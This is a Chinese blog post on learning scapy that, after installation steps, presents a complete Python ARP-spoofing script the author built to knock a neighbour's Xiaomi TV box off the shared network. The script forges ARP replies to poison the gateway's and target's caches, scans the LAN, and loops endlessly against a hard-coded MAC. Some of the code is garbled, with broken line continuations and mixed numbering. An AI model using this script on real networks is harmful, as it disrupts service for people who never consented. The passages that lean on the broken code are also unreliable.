学习scapy

2017-03-03 10:01:21 来源:http://www.cnblogs.com/5A4A5943/p/6419127.html 作者:Python_博客园

不久前才知道scapy这个工具,相见恨晚。其强大在于可以修改数据包,基于python,使用更加方便。


真正开始研究TCP/IP是在半年前,本人不才,拿着FreeRTOS-TCP/IP源码看了个把月,仍然迷茫,好在TCP/IP协议部分明白了很多。


一个月前接触Python,目前正在慢慢熟悉。


Ubuntu14.04安装scapy


由于我的系统已安装Python2.7,但是没有安装pip,这里首先安装pip


sudo apt-get install python-pip

如果失败的话可以尝试如下一句


sudo apt-get update --fix-missing

pip安装完成之后,安装scapy(下面用sudo pip直接装进了系统Python;更稳妥的做法是装在virtualenv里,免得和apt管理的包冲突):


sudo pip install scapy

至此,scapy安装完成,可以如下测试一下:


vmuser@Linux-host:~/桌面$ python
Python 2.7.3 (default, Oct 26 2016, 21:04:23)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> a = IP()
>>> a
<IP|>
>>> get_if_hwaddr("eth0")
'00:0c:29:70:b1:85'
>>>

eth0是我的网卡。


Python3.6


pip install scapy

或者是


pip3 install scapy-python3

ARP ATTACK EXAMPLE (1)



硬件平台:Dragon Board 410C



系统:Debian



python:2.7


一人在外租房,免不了邻里间相互打扰,近期有房客看电视且声音不小,正好手边有一开发板,计划用scapy发起ARP攻击来使其掉线。


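ARP攻击的原理略谈一下:ARP协议本身没有任何认证,主机收到ARP报文就会直接更新自己的缓存,所以基本手法就是伪造报文,污染主机或网关的ARP缓存表;复杂一些的就要佯装网关,做中间人攻击。也正因如此,防御侧一般靠静态ARP绑定、交换机上的动态ARP检测(DAI),或者用arpwatch一类工具监控IP-MAC对应关系的异常变化。限于本人水平,怎么简单怎么来吧。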


首先要知道对方是一个什么样的设备:使用局域网扫描工具扫描活动主机,然后根据MAC地址对应的厂商信息来判断到底是哪一台设备,扫描结果如下:


C8-3A-35-C0-05-15 Tenda Technology Co., Ltd.
04-E6-76-46-A6-F3 AMPAK Technology, Inc.
78-02-F8-34-4D-B5 私营
24-09-95-95-E2-02 HUAWEI TECHNOLOGIES CO.,LTD
20-47-47-BA-99-1E Dell Inc.
70-14-A6-37-3F-0F Apple, Inc.
E8-B4-C8-7B-F3-0F Samsung Electronics Co.,Ltd
48-3B-38-D9-8D-D8 Apple, Inc.

其中“AMPAK”最可疑,百度一番后,鉴定为小米盒子。(题外话:AMPAK被多次发现做IP扫描。。。。)


锁定MAC之后,我猜他们(一对老夫妇,天天看电视,うるさい!!)是逃不了了


1 #!/usr/bin/env python
2 # _*_ coding=utf-8 _*_
3
4 from scapy.all import *
5 import time
6 import random
7 #-------------------------------------------------------
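def GetSubNet(OurIP):
    '''
    Return the part of a dotted address up to and including its last dot.

    OurIP: address as a dotted string, e.g. "192.168.0.105" -> "192.168.0."
    Returns "" when OurIP contains no dot at all.

    NOTE: the result keeps the trailing dot, and it is only the network
    part when the host sits on a /24 -- the netmask is never consulted.
    '''
    # str.rfind returns -1 when there is no dot, which makes the slice end 0
    # and the result the empty string -- the same outcome as scanning forward
    # dot by dot and cutting after the last one found.
    return OurIP[:OurIP.rfind('.') + 1]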
22 #-------------------------------------------------------
23 def GetMac(tgtIP):
24 '''
25 获取目标IP的MAC地址。
26 tgtIP:目标IP地址
27 '''
28 try:
29 tgtMac = getmacbyip(tgtIP)
30 return tgtMac
31 except:
32 print (tgtIP,"请检查目标IP是否存活")
33 #-------------------------------------------------------
def GetBrocastIP(OurIP):
    '''
    Derive the LAN broadcast address from our own address.

    OurIP: our IP address as a dotted string
    Returns the text of OurIP through its last dot, followed by "255".

    NOTE(review): replacing the last octet with 255 is the broadcast
    address only on a /24 network; the netmask is not looked at.
    '''
    # Same prefix GetSubNet() produces, computed inline: keep everything
    # through the final '.' ("" if there is none), then append host part 255.
    last_dot = OurIP.rfind('.')
    prefix = OurIP[:last_dot + 1]
    return prefix + "255"
40 #-------------------------------------------------------
41 def GetForgetIP(OurIP,Num):
42 '''
43 伪造IP地址
44 OurIP:我们自己的IP
45 Num:要伪造多少个IP地址
46 '''
47 SubString = GetSubNet(OurIP)
48 #伪造IP
49 ForgetIP = []
50 i = 0
51 while i < Num:
52 num = int(random.uniform(0,255))
53 TempIP = SubString + "%d"%num
54 if TempIP == OurIP:
55 continue
56 else:
57 ForgetIP.append(TempIP)
58 i = i + 1
59 return ForgetIP
60 #-------------------------------------------------------
61 def GetForgeMac(OurMac,Num):
62 '''
63 生成随机MAC地址
64 OurMac:我们自己的MAC地址,不能跟自己重复啊
65 '''
66 ForgeMac = []
67 j = 0
68 while j < Num:
69 while True:
70 i = 0
71 TempMac = ""
72 while i < 6:
73 num = int(random.uniform(0,255))
74 TempMac = TempMac + "%02X"%num
75 if i <= 4:TempMac = TempMac + ":"
76 i = i + 1
77 if TempMac == OurMac:
78 pass
79 else:
80 ForgeMac.append(TempMac)
81 j = j + 1
82 break
83 return ForgeMac
84 #-------------------------------------------------------
85 def AttackMac(Mac,face,Num,Interval,GW_IP):
86 '''
87 攻击MAC
88 Mac:要攻击的MAC地址
89 face:发送攻击报文的网络接口
90 GW:是否只攻击网关
91 '''
92 Broadcast_mac = "FF:FF:FF:FF:FF:FF"
93 GW_MAC = ""
94 try:
95 OurIP = get_if_addr(face)
96 if GW_IP != "":GW_MAC = GetMac(GW_IP)
97 except:
98 OurIP = "192.168.0.105"
99 return
100 Broadcast_ip = GetBrocastIP(OurIP)
101 while True:
102 ForgeIP = GetForgetIP(OurIP,Num)
103 #生成数据包
104 if GW_IP != "":
105 #攻击网关
106 pkt = Ether(dst = GW_MAC,src = Mac)//
107 ARP(psrc = ForgeIP,pdst = GW_IP,/
108 hwsrc = Mac,hwdst = GW_MAC,op = 2)
109 else:
110 #攻击全网
111 pkt = Ether(dst = Broadcast_mac,src = Mac)//
112 ARP(psrc = ForgeIP,pdst = Broadcast_ip,/
113 hwsrc = Mac,op = 1)
114 #发送数据包
115 try:
116 #print(ls(pkt))
117 #input()
118 sendp(pkt,iface = face)
119 except:
120 print("!!Send Error!!")
121 break
122 time.sleep(float(Interval))
123 #-------------------------------------------------------
124 def AttackIP(tgtIP,face,Num,Interval,GW_IP):
125 '''
126 攻击IP地址
127 tgtIP:目标IP
128 face:网卡接口
129 Num:攻击报文数目
130 Interval:攻击间隔
131 '''
132 #广播地址
133 GW_MAC = ""
134 Broadcast_mac = "FF:FF:FF:FF:FF:FF"
135 #本地
136 try:
137 OurMac = get_if_hwaddr(face)
138 OurIP = get_if_addr(face)
139 if GW_IP != "":GW_MAC = GetMac(GW_IP)
140 except:
141 OurMac = "00:00:00:00:00:00"
142 OurIP = "192.168.0.105"
143 Broadcast_ip = GetBrocastIP(OurIP)
144 while True:
145 #准备数据包
146 ForgeMac = GetForgeMac(OurMac,Num)
147 if GW_IP != "":
148 #攻击网关
149 pkt = Ether(dst = GW_MAC,src = ForgeMac)//
150 ARP(psrc = tgtIP,pdst = GW_IP,/
151 hwsrc = ForgeMac,hwdst = GW_MAC,op = 2)
152 else:
153 #攻击全网
154 pkt = Ether(dst = Broadcast_mac,src = ForgeMac)//
155 ARP(psrc = tgtIP,pdst = Broadcast_ip,/
156 hwsrc = ForgeMac,op = 1)
157 #发送数据包
158 try:
159 sendp(pkt,iface = face)
160 except:
161 print("!!Send Error!!")
162 break
163 #延迟
164 time.sleep(float(Interval))
165 #-------------------------------------------------------
166 Table = {}
167 def Scanf(OurIP,Start,End):
168 '''
169 扫描网络,获取IP-MAC并保存
170 OurIP:我们的IP地址
171 Start:扫描起始地址
172 End:扫描结束地址
173 例如:OurIP = 192.168.0.105,Start = 99,End = 150
174 扫描IP范围:192.168.0.99 ~ 192.168.0.150
175 '''
176 SubString = GetSubNet(OurIP)
177 for num in range(Start,End):
178 ip = SubString+str(num)
179 arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip, hwdst="ff:ff:ff:ff:ff:ff")
180 res = srp1(arpPkt, timeout = 1, verbose=0)
181 if res:
182 Table[res.psrc] = res.hwsrc
183 return Table
184 #-------------------------------------------------------
185 def GetIpByMac(Mac):
186 if len(Table) == 0:return None
187 return Table.get(Mac)
188
189 def Attack_xiaomi(Face,PackNum,Counter,Interval):
190 '''
191 攻击小米盒子
192 Face:网卡接口
193 PackNum:数据包数目
194 Counter:攻击次数(-1:无限次)
195 Interval:攻击间隔
196 例如:Face="wlan0",PackNum=10,Counter=-1,Interval=1
197 '''
198 MY_ip = get_if_addr(Face)
199 MY_mac = get_if_hwaddr(Face)
200 if MY_ip == None or MY_mac == None:return
201
202 GW_ip = "192.168.0.1"
203 GW_mac = GetMac(GW_ip)
204 if GW_mac == None:return
205
206 Scanf(MY_ip,99,150)
207
208 XM_mac = "04:E6:76:46:A6:F3"
209 XM_ip = GetIpByMac(XM_mac)
210 if XM_ip == None:return
211
212 while True:
213 #Attack packs
214 Temp_mac = GetForgeMac(MY_mac,PackNum)
215 Temp_ip = GetForgetIP(MY_ip,PackNum)
216
217 PKT_2_XM_4_mac = Ether(src = GW_mac,dst = XM_mac)/ARP(psrc = Temp_ip,pdst = XM_ip,op = 2)
218 PKT_2_XM_4_ip = Ether(src = Temp_mac,dst = XM_mac)/ARP(psrc = GW_ip,pdst = XM_ip,op = 2)
219 PKT_2_GW_4_XM_mac = Ether(src = XM_mac,dst = GW_mac)/ARP(psrc = Temp_ip,pdst = GW_ip,op = 2)
220 PKT_2_GW_4_XM_ip = Ether(src = Temp_mac,dst = GW_mac)/ARP(psrc = XM_ip,pdst = GW_ip,op = 2)
221 try:
222 sendp(PKT_2_XM_4_mac,iface = Face)
223 time.sleep(0.5)
224 sendp(PKT_2_XM_4_ip,iface = Face)
225 time.sleep(0.5)
226 sendp(PKT_2_GW_4_XM_mac,iface = Face)
227 time.sleep(0.5)
228 sendp(PKT_2_GW_4_XM_ip,iface = Face)
229 except:
230 print("!!Send Error!!")
231 #sleep
232 num = int(random.uniform(0,Interval))
233 time.sleep(num)
234 if Counter == -1:
235 pass
236 else:
237 Counter = Counter - 1
238 if Counter == 0:
239 return
240
241 if __name__ == "__main__":
242 #while True:
243 #AttackIP("192.168.0.108","wlan0",10,60,"192.168.0.1")
244 #AttackMac(Mac,face,Num,Interval,GW_IP):
245 #AttackMac("C8:3A:35:C0:05:15","wlan0",2,2,"192.168.0.108")
246 while True:
247 Attack_xiaomi("wlan0",20,30,5)
